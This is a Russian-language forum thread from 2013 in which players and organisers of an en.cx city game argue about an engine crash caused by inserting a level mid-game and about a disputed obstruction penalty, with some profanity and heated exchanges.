Нашол, посотрел. Я проебал момент, прошу прощения. Но там такая хуета намичается, меня смещают и обещают бошку отрубить.

MiX
20-03-2013, 12:34
Мы никому не враги.

Тем не менее то, что вчера сбросились составы и оценки двух команд - Расчлененки и КПБ - факт.
Видимо опять куда-то не туда нажали.

Sgushchenka
20-03-2013, 12:42
не вброса ради...
а в грядущую субботу с движком кто общаться будет? (вам технчиеские консультации не требуются?)
я боюсь мы не переживем подобного в рамках большого дл, правда.
по косякам по движку вы общались с тех.помощью и Константином id2?
на других доменах вродь люто бешеного бардака не замечено? (это обще системаная ботва или локальный ад?)

Дед
20-03-2013, 12:55
Во первых, команда Футурамы ехала строго за лисой и не принимала попыток маневра, коими можно считать мигание указателя поворота, вытащенная рука из из бокового окна авто или откровенного мата из окна авто: "Уступи сцука дорого, а то въ*бу тебе в бочину с разгону!!!!", соответственно можно сделать вывод, что Футурама ехала прямо, а рядом ехавшая машина не может им в этом помешать. Во вторых команда Пэкман догнав лису и поровнявшись с нами увидела код с ТРЕТЬЕГО ряда:eek: и вбила его соответственно машина СПГ им то же не мешала, в то время как машина Пэкмена старательно выжимала СПГ от лисы, тем самым мешая прохождению уровня СПГ (СПГ в то время не знала, что уровень закрыт, ввиду отсутствия инета). Соответственно нарушала правила проекта команда Пэкмен, а почему наказали нас? :D

грициан
20-03-2013, 12:55
не вброса ради...
а в грядущую субботу с движком кто общаться будет? (вам технчиеские консультации не требуются?)
я боюсь мы не переживем подобного в рамках большого дл, правда.
по косякам по движку вы общались с тех.помощью и Константином id2?
на других доменах вродь люто бешеного бардака не замечено? (это обще системаная ботва или локальный ад?)

В пятницу был локальный, только с движком на нашем домене из-за некорректного вмешательства. Про ситуацию с составами непонятно.

Sgushchenka
20-03-2013, 12:59
В пятницу был локальный, только с движком на нашем домене из-за некорректного вмешательства. Про ситуацию с составами непонятно.
Ок. Тогда вопрос - как гарантировать исключение подобной ситуации в субботу (да и в прицнипе на последующих играх, если дело не в самом движке)? Есть масса людей, шаряших в зеленом двигле - выбирай любого, общайся. Что бы проговорить все возможные моменты грядущего, что бы "некорректное вмешательство" ™ не повторялось...

DbSergey
20-03-2013, 13:06
Ок. Тогда вопрос - как гарантировать исключение подобной ситуации в субботу (да и в прицнипе на последующих играх, если дело не в самом движке)? Есть масса людей, шаряших в зеленом двигле - выбирай любого, общайся. Что бы проговорить все возможные моменты грядущего, что бы "некорректное вмешательство" ™ не повторялось...

Что именно привело к падению движка - известно. Почему именно это привело к падению движка - над этим сейчас ломают голову технические специалисты EN.CX. Независимо от того, станут ли ясны причины его падения, новый повод создан не будет.

El Red
20-03-2013, 13:11
по косякам по движку вы общались с тех.помощью и Константином id2?
на других доменах вродь люто бешеного бардака не замечено? (это обще системаная ботва или локальный ад?)
Писал уже
баг с падением движка я воспроизвел на демо-движке, написал техдиру ЕН, он ответил, что это всегда было запрещено, теперь, видимо, сломалось, и обещал пофиксить.

грициан
20-03-2013, 13:15
Что именно привело к падению движка - известно. Почему именно это привело к падению движка - над этим сейчас ломают голову технические специалисты EN.CX.

Ответ на второй вопрос такой же очевидный, как и первый.
Игра линейная. Команды находятся на уровне №5. Потом авторы добавляют новый уровень между №4 и 5 (почему это технически возможно сделать надо спрашивать у разработчиков движка). Уровень №5, на котором находятся команды становится уровнем №6. В линейной последовательности после уровня №6 можно перейти только на уровень №7. Соответственно, новый уровень №5 части команд движок выдать никак не может. Случился коллапс...

Tatyan-ka
20-03-2013, 13:16
В КЦ у СПГ были 5 человек (10 человек состава на игре, из которых 5 в машине, верно?), плюс в поле наверняка было не одно устройство с доступом к движку (например, на уровне 9 коды из поля вбивали Крамакс и Тэххи)
Крамакс был за рулем, КЦ на уровне с лисой всем составом ушло в туалет.
Не надо делать выводов из своих каких-то-только-что-придуманных фактов.

Sgushchenka
20-03-2013, 13:17
Няшно, оно все, конечно.
Но не хотелось бы потом опять читать после игровые гугло-доки с комментариями по внесенным в статистику изменениям по косякам, вот правда...

Sgushchenka
20-03-2013, 13:25
грициан, угу... грусть печаль, грусть печаль... главное тепеь движок не потерять!
а так я запиливала такие вот "технические заглушки" для компенсации стоп-таймов и все было ок (=
"некорректное вмешательство" ™ - такое некорректное, такое вмешательство...
верю надеюсь жду, что в субботу схема игры будет прописана в дивг так, что все "тонкие" моменты будут предусмотрены.
всем ня! :p

El Red
20-03-2013, 13:28
Игра открыта, правьте составы.
Закроем сегодня после 21-00

El Red
20-03-2013, 13:30
а так я запиливала такие вот "технические заглушки" для компенсации стоп-таймов и все было ок (=
"некорректное вмешательство" ™ - такое некорректное, такое вмешательство...

ты запиливала их в линейной игре?
у тебя были команды, которые уже прошли уровень, для которого ты ставишь заглушку?

nadlooshi
20-03-2013, 13:33
а так я запиливала такие вот "технические заглушки" для компенсации стоп-таймов и все было ок (= :p
а это точно было на линейной последовательности или все же на указанной нелинейной? ну просто ради интереса ^_^

Составы для редактирования недоступны, так как есть ИК игры.
Надо жмакнуть "Отменить начисленные очки" для возможности редактирования составов

El Red
20-03-2013, 13:36
Ответ на второй вопрос такой же очевидный, как и первый.
Игра линейная. Команды находятся на уровне №5. Потом авторы добавляют новый уровень между №4 и 5 (почему это технически возможно сделать надо спрашивать у разработчиков движка). Уровень №5, на котором находятся команды становится уровнем №6. В линейной последовательности после уровня №6 можно перейти только на уровень №7. Соответственно, новый уровень №5 части команд движок выдать никак не может. Случился коллапс...

Вопрос исключительно внутренней реализации компонента, который отвечает за выдачу заданий. Сферически в вакууме вполне можно реализовать линейную выдачу заданий, корректно обрабатывающую добавление уровней. Насколько сложно это в конкретно взятом двигле - знают только те, кто видел его код. Судя по тому, что konstantin обещал вернуть запрет добавления уровней, это или слишком сложно, или им просто лень/ненужно/нерентабельно/прочее (ненужное зачеркнуть)

El Red
20-03-2013, 13:39
Составы для редактирования недоступны, так как есть ИК игры.
Надо жмакнуть "Отменить начисленные очки" для возможности редактирования составов

http://d1.endata.cx/data/games/41519/sdf34f34r.png

у тебя точно есть капитанские права?)

nadlooshi
20-03-2013, 13:41
http://d1.endata.cx/data/games/41519/sdf34f34r.png

у тебя точно есть капитанские права?)

Умираю со смеху.

грициан
20-03-2013, 13:48
Вопрос исключительно внутренней реализации компонента, который отвечает за выдачу заданий. Сферически в вакууме вполне можно реализовать линейную выдачу заданий, корректно обрабатывающую добавление уровней. Насколько сложно это в конкретно взятом двигле - знают только те, кто видел его код. Судя по тому, что konstantin обещал вернуть запрет добавления уровней, это или слишком сложно, или им просто лень/ненужно/нерентабельно/прочее (ненужное зачеркнуть)

Так и сейчас в линейной игре будет корректно работать добавление уровня, если добавлять уровень в "невыданную" часть игры. То, что сейчас открылась техническая возможность сделать то, что произошло в пятницу - то ли баг, то ли нововведение какое-то, раньше такого не видел.
А так да, указанная последовательность хоть и при фактической линейной спасет подобную ситуацию.

дядя Егор
20-03-2013, 13:57
Вообще игра будет в любом случае говно если во время игры автор каким либо образом правит движок, автор не имеет право это делать вообще, на своих советах поднимайте этот вопрос, уровень косячный? Снял нахер да и все..более 3х уровней сняли за игру, не состоялась игра!

DrK
20-03-2013, 14:17
Вообще игра будет в любом случае говно если во время игры автор каким либо образом правит движок, автор не имеет право это делать вообще, на своих советах поднимайте этот вопрос, уровень косячный? Снял нахер да и все..более 3х уровней сняли за игру, не состоялась игра!

Радикальность радикальностью не вышибешь. Уверен, есть куча примеров того, когда исправления по ходу игры не влияли на игровой процесс. Незаметное никто не обсуждает, ага?

El Red
20-03-2013, 14:44
Так и сейчас в линейной игре будет корректно работать добавление уровня, если добавлять уровень в "невыданную" часть игры. То, что сейчас открылась техническая возможность сделать то, что произошло в пятницу - то ли баг, то ли нововведение какое-то, раньше такого не видел.
А так да, указанная последовательность хоть и при фактической линейной спасет подобную ситуацию.

Я про то, что можно сделать корректную обработку добавления уровня даже в выданную чать игры. Но в ЕН этого не сделают.

То, что открылась техническая возможность - баг. Константин сказал, что раньше сделать этого было нельзя.

El Red
20-03-2013, 14:46
Умираю со смеху.
закрыл-открыл. попробуй еще раз.

nadlooshi
20-03-2013, 14:48
закрыл-открыл. попробуй еще раз.
Всё работает, спасибо большое.

дядя Егор
20-03-2013, 14:57
Влияет это всегда, это означает либо игра недоработана и автор доделывает ее в момент игры, как можно высчитать время уровня где написан код неверно, команда может быть потеряла победу над этим кодом, а автор изменил код и соперники прошли его удачно, неверно что то сделал снимай уровень или пускай все мучаються, перебираю че хотят делают, как можно написать код чтобы я смотрел в него и не видел что там написано?почему на штыре говно код написали- типа спрятали, его даже искать не надо было, огромная надпись, но зачем на штыре? Рядом на стене напиши и искать будем так же и по стене можно написать лучше..опытные игроки,а игру написали, плохую,руки трястись начались и начали править все что можно.

KoIIIaK
20-03-2013, 17:30
СПГ не мешало

Clinique
20-03-2013, 17:31
Влияет это всегда, это означает либо игра недоработана и автор доделывает ее в момент игры, как можно высчитать время уровня где написан код неверно, команда может быть потеряла победу над этим кодом, а автор изменил код и соперники прошли его удачно, неверно что то сделал снимай уровень или пускай все мучаються, перебираю че хотят делают, как можно написать код чтобы я смотрел в него и не видел что там написано?почему на штыре говно код написали- типа спрятали, его даже искать не надо было, огромная надпись, но зачем на штыре? Рядом на стене напиши и искать будем так же и по стене можно написать лучше..опытные игроки,а игру написали, плохую,руки трястись начались и начали править все что можно.

Я это прочитал =)

Paltus1317
20-03-2013, 17:37
Я это прочитал =)

Спиды отобрал бы лучше

Velkopiterskij
20-03-2013, 17:39
https://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=0Строка 4.
Апелляции: Футурама На уровне лиса начисли минимум 10 минут бонуса, за помеху от команды СПГ, про которую уже написала команда Пакмэн.
СПГ не мешало


Кошак, какому из двух сообщений верить?

El Red
20-03-2013, 17:40
Кошак, ты сделал мой день!

Пишет мужик заявление: сосед украл у меня мешок картошки. Устраивают суд. Спрашивают: "Украл сосед картошку?" - "Украл." - "Сколько?" - "Мешок". Соседа сажают.
Проходит два дня, мужик возвращается и заявляет, что сосед картошку не крал, а ее мыши съели.
Только сосед уже сидит, и приговор окончательный, амнистия и отмена приговора в законодательстве не предусмотрены.

Такие дела.

DrK
20-03-2013, 17:42
Влияет это всегда, это означает либо игра недоработана и автор доделывает ее в момент игры, как можно высчитать время уровня где написан код неверно, команда может быть потеряла победу над этим кодом, а автор изменил код и соперники прошли его удачно, неверно что то сделал снимай уровень или пускай все мучаються, перебираю че хотят делают, как можно написать код чтобы я смотрел в него и не видел что там написано?почему на штыре говно код написали- типа спрятали, его даже искать не надо было, огромная надпись, но зачем на штыре? Рядом на стене напиши и искать будем так же и по стене можно написать лучше..опытные игроки,а игру написали, плохую,руки трястись начались и начали править все что можно.

Над русским языком поработай, пожалуйста. По сути - ничего нового не написал, все контраргументы применимы.

Effa
20-03-2013, 17:44
Мешала - не мешала. От создателей "махала - не махала".

грициан
20-03-2013, 17:45
Мешала - не мешала. От создателей "махала - не махала".

:D:D:D

CinderellA
20-03-2013, 17:52
Мешала - не мешала. От создателей "махала - не махала".

Этапять!

Дед
20-03-2013, 17:54
Игра открыта, правьте составы.
Закроем сегодня после 21-00



Кошак, ты сделал мой день!

Пишет мужик заявление: сосед украл у меня мешок картошки. Устраивают суд. Спрашивают: "Украл сосед картошку?" - "Украл." - "Сколько?" - "Мешок". Соседа сажают.
Проходит два дня, мужик возвращается и заявляет, что сосед картошку не крал, а ее мыши съели.
Только сосед уже сидит, и приговор окончательный, амнистия и отмена приговора в законодательстве не предусмотрены.

Такие дела.
О, можно пересчитать еще:cool:

El Red
20-03-2013, 17:57
Влияет это всегда, это означает либо игра недоработана и автор доделывает ее в момент игры, как можно высчитать время уровня где написан код неверно, команда может быть потеряла победу над этим кодом, а автор изменил код и соперники прошли его удачно, неверно что то сделал снимай уровень или пускай все мучаються, перебираю че хотят делают, как можно написать код чтобы я смотрел в него и не видел что там написано?

На этой игре был исправлен только один код. С его неправильным написанием столкнулись две команды. Для одной это не повлияло на взятие (у них уже была та часть информации, которая открывалась этим кодом), второй команде взятие уровня засчитано про первому вбитию неправильного кода. Видишь, никто не ущемлен, всё по-честному.

El Red
20-03-2013, 17:58
О, можно пересчитать еще:cool:
Игра открыта исключительно для того, чтобы команды могли отредактировать свои составы. Статистика окончательная.

Мешала - не мешала. От создателей "махала - не махала".
аххаха-ха-ха))
*ищет кнопку "лайк"*

Jaguar
20-03-2013, 18:05
а теперь вопрос команде Футурама: в чем был сокровенный смысл пи**еть оргам?

Тэ.
20-03-2013, 18:28
Мешала - не мешала. От создателей "махала - не махала".

Да-да, мы это еще джва дня назад в чатиках постить начали )) но собсна об адекватности тех оргов уже легенды слагают, вот, подрастающая смена теперь наметилась

Heckfy
20-03-2013, 18:40
Дяде Егору похуй на ваши замечания. В целом он прав.

Deneb
20-03-2013, 19:52
Да-да, мы это еще джва дня назад в чатиках постить начали )) но собсна об адекватности тех оргов уже легенды слагают, вот, подрастающая смена теперь наметилась
а я ошибусь, если скажу, что они все потом в Драйве играли? и махальщики и мешальщики?

дядя Егор
20-03-2013, 19:52
Я учился руска школа.
Эл:mad: я бы написал конечно все ,да не моя это война.

DEd_MONro
20-03-2013, 20:39
Дяде Егору похуй на ваши замечания. В целом он прав.

+1

CraMax
20-03-2013, 20:58
Кошак, ты сделал мой день!

Пишет мужик заявление: сосед украл у меня мешок картошки. Устраивают суд. Спрашивают: "Украл сосед картошку?" - "Украл." - "Сколько?" - "Мешок". Соседа сажают.
Проходит два дня, мужик возвращается и заявляет, что сосед картошку не крал, а ее мыши съели.
Только сосед уже сидит, и приговор окончательный, амнистия и отмена приговора в законодательстве не предусмотрены.

Такие дела.

Приговор окончательный можно обжаловать в кассации. И амнистия и отмена приговора в законодательстве предусмотрены. Но не будем об этом.

Игра открыта исключительно для того, чтобы команды могли отредактировать свои составы. Статистика окончательная.




Я все таки, требую отмены несправедливого решения. И призываю Администратора проекта вмешаться в данный "судебный процесс".
Суд идет не за 1 место. И разница между между нашим 6 и 4 местом не велика. И мне все равно какими мы будем в итоге. Но хочется справедливости.

El Red
20-03-2013, 21:33
Приговор окончательный можно обжаловать в кассации. И амнистия и отмена приговора в законодательстве предусмотрены. Но не будем об этом.

в этой воображаемой стране таких процедур не предусмотрено
если есть желание - поищи: https://docs.google.com/document/d/1KcZD4q_T9eZMpiSjpUquULoiRV9815H2dmmuLErW9tQ

CraMax
20-03-2013, 21:38
в этой воображаемой стране таких процедур не предусмотрено
если есть желание - поищи: https://docs.google.com/document/d/1KcZD4q_T9eZMpiSjpUquULoiRV9815H2dmmuLErW9tQ

В этой воображаемой стране предусмотрена адекватность и рассудительность. Но это видимо не про вас.

Ждем Администратора направления DL1.

Heckfy
20-03-2013, 21:42
Ололо! Миша, твой выход!

Jaguar
20-03-2013, 21:48
Голосовалка????:confused:

DEd_MONro
20-03-2013, 21:55
Из тех же правил
3.3.5. Организаторы обязаны обеспечить непредвзятое судейство и равные условия выполнения уровней для всех играющих команд.

3.6.1. В случае возникновения на игре форс-мажорных обстоятельств, приводящих к невозможности получить адекватную статистику прошедшей игры, может быть поднят вопрос о признании игры внезачётной.

Potaki
20-03-2013, 21:56
Что изменилось то с новостями от Кошака? ну мешали вы одной только команде.

CraMax
20-03-2013, 22:15
Что изменилось то с новостями от Кошака? ну мешали вы одной только команде.
Potaki, ну давай не будем начинать..
Причины нашего присутствия на уровне вам известны.
Кто кому мешал?
Вы подрезали нас. Это не красиво. Это опасно.
И не стыдно после этого выпрашивать штраф в свою пользу?
Да и писали уже выше. 3 команды брали лису одновременно. О каком мешании идет речь? В очередь надо было выстроится и просить стоптаймы потом?

Potaki
20-03-2013, 22:23
Potaki, ну давай не будем начинать..
Причины нашего присутствия на уровне вам известны.
Кто кому мешал?
Вы подрезали нас. Это не красиво. Это опасно.
И не стыдно после этого выпрашивать штраф в свою пользу?
Да и писали уже выше. 3 команды брали лису одновременно. О каком мешании идет речь? В очередь надо было выстроится и просить стоптаймы потом?

Ты серьезно считаешь, что можно считать ваши причины присутсвия на уровне адекватными? то есть вот вы берете код. пытаетесь его вбить. у вас вылетает интеренет. кц ушло в туалет всем составом и в течении 5 минут не берет телефоны. к тому же на всех телефонах у экипажа нет интернета и вы 5 минут катаетесь с кодом имея код и не понимаю, что же с ним сделать в такой аномалии.

Вас подрезали после долгих миганий. так как мы знали, что вы на этом уровне и вы мешали нам подъехать к окну с флагом. нам повезло, что заметили код через ряд.

Не наказав вас, мы создаем инцидент, что пока кц курит следующее задание можно мешать другим командам брать предыдущее, что я считаю вы и делали.

DEd_MONro
20-03-2013, 22:31
Ты серьезно считаешь, что можно считать ваши причины присутсвия на уровне адекватными? то есть вот вы берете код. пытаетесь его вбить. у вас вылетает интеренет. кц ушло в туалет всем составом и в течении 5 минут не берет телефоны. к тому же на всех телефонах у экипажа нет интернета и вы 5 минут катаетесь с кодом имея код и не понимаю, что же с ним сделать в такой аномалии.

Вас подрезали после долгих миганий. так как мы знали, что вы на этом уровне и вы мешали нам подъехать к окну с флагом. нам повезло, что заметили код через ряд.

Не наказав вас, мы создаем инцидент, что пока кц курит следующее задание можно мешать другим командам брать предыдущее, что я считаю вы и делали.

Таким образом, ты как бы намекаешь, что если бы не мы, то вы бы взяли уровень за 3 минуты?

Potaki
20-03-2013, 22:36
Таким образом, ты как бы намекаешь, что если бы не мы, то вы бы взяли уровень за 3 минуты?

нет. мы может взяли бы его на секунд 30 максимум быстрее.

тут не в этом суть. есть правила проекта. они нарушены. и не важно насколько вы помешали нам.

CraMax
20-03-2013, 22:37
Ты серьезно считаешь, что можно считать ваши причины присутсвия на уровне адекватными? то есть вот вы берете код. пытаетесь его вбить. у вас вылетает интеренет. кц ушло в туалет всем составом и в течении 5 минут не берет телефоны. к тому же на всех телефонах у экипажа нет интернета и вы 5 минут катаетесь с кодом имея код и не понимаю, что же с ним сделать в такой аномалии.

Вас подрезали после долгих миганий. так как мы знали, что вы на этом уровне и вы мешали нам подъехать к окну с флагом. нам повезло, что заметили код через ряд.

Не наказав вас, мы создаем инцидент, что пока кц курит следующее задание можно мешать другим командам брать предыдущее, что я считаю вы и делали.
Вот поэтому я и не хотел поднимать эту тему. Но раз уж понеслась, то ок.
1. Я считаю наши причины вполне адекватными.

2.Кто вам давал право подрезать нас? На каком основании? Вы грубо нарушил ПДД, в результате чего могло случится серьезное ДТП.
Вот здесь уже можно несколько штрафов по 30 минут сделать вам за это.
Какие долгие мигания? Вы подъехали и сразу нас вырезали.

3. Кто вам давал право наказывать нас? Сейчас вы только создаете инцидент, после которого можно по любой мелочи писать апелляции. Тут уже говорили про очередь на ко3...

Potaki
20-03-2013, 22:40
3. Кто вам давал право наказывать нас? Сейчас вы только создаете инцидент, после которого можно по любой мелочи писать апелляции. Тут уже говорили про очередь на ко3...

если человек создает очередь на ко3 находясь на уровне, то это не нарушает правила и не имеет отношения к данной ситуации.

если человек после окончания уровня остается сидеть на ко3 и не слезает, мешая всем остальным, то это аналогичная ситуация.

DEd_MONro
20-03-2013, 22:42
нет. мы может взяли бы его на секунд 30 максимум быстрее.

тут не в этом суть. есть правила проекта. они нарушены. и не важно насколько вы помешали нам.

ОТКУДА ТОГДА ЦИФРА В 5 МИНУТ?

Potaki
20-03-2013, 22:47
ОТКУДА ТОГДА ЦИФРА В 5 МИНУТ?

примерная.
ну у нас по времени прохождения разница 3 минуты. соответственно 3 минуты вы точно катались. мы уехали, вы остались кататься. ну вот и написал, что 5 минут.

CraMax
20-03-2013, 22:49
если человек создает очередь на ко3 находясь на уровне, то это не нарушает правила и не имеет отношения к данной ситуации.

если человек после окончания уровня остается сидеть на ко3 и не слезает, мешая всем остальным, то это аналогичная ситуация.

он может там сидеть на верху и кривляться, и получить штраф в 30 минут. А может и сидеть ждать страховку, потому что страшно слезать, или может просто посидеть отдохнуть, чтоб не подвергать свою жизнь опасности - и в итоге тоже получит штраф в 30 минут - после апелляции от рядом идущих конкурентов.
Тут все очень размазано, и дискутировать на эту тему можно бесконечно.

Давайте дождемся Администратора

prinncessa
20-03-2013, 22:56
Ад и израиль.
А можно было вполне спокойно рассказать про упавший интернет и отсутствующее КЦ в ответ на пост Кости (http://dead-line.spb.ru/forum/showpost.php?p=260461&postcount=41), и всё было бы гораздо тише и спокойнее.

Своей апелляцией мы не имели целью как-либо влиять на положение команд в статистике, а лишь хотели привлечь внимание к вопросу, который нас волновал.
Не получив ответа на свой вопрос логично было подумать, что СПГ считает нормальной ситуацию, которую увидели мы со своей стороны. Возможности посмотреть на нее как-то иначе нам, к сожалению, не предоставили.

В свою очередь, я лично тоже считаю, что штраф в 30 минут, даже если он оправдан (хрен его сейчас разберешь), это слишком, тем не менее, в правилах проекта четко написано, что все решения организаторов являются окончательными и не подлежат изменению.
На крайний случай, у нас есть администратор проекта, который может как-либо отреагировать на сложившийся конфликт, но почему-то до сих пор этого не сделал.

melamory
21-03-2013, 00:05
вот хотела ж написать отзыв об игре... почитала ваши терки, ужаснулась.

так что внесу ноту позитива)
нам все понравилось, нас не зацепил ни один косяк движка (ну, только ошибка на первом уровне, насторожила) =)
а вообще, все здорово, весело, динамично )
только вот мне, светловолосой девушке, было сложно разгадывать айтишные задания )) моя глубокая признательность и уважение тем, кто их осилил )
опечалил нечитабельный код на железяке, не осилив прочитать который, мы почему-то не подумали позвонить оргам, просто дождались, когда коды разобьет еще больше, и пошли на второй этаж =) но и это не смогло испортить нам настроения, ибо тупо искать, нам тоже нравится )
но все это не существенно, если остались хорошие впечатления, а у нас так и вышло )

так что от меня лично, большое спасибо ограм за приятно проведенные выходные :)

Ol4ik
21-03-2013, 00:08
Еще во время игры вспомнилась прекрасная песня "герой на героине" :) тут же косяк на косяке, и ад и и израиль после!!

Спасибо за игру. Она могла получиться очень прзитвной. Разборки и косяки портят впечатление.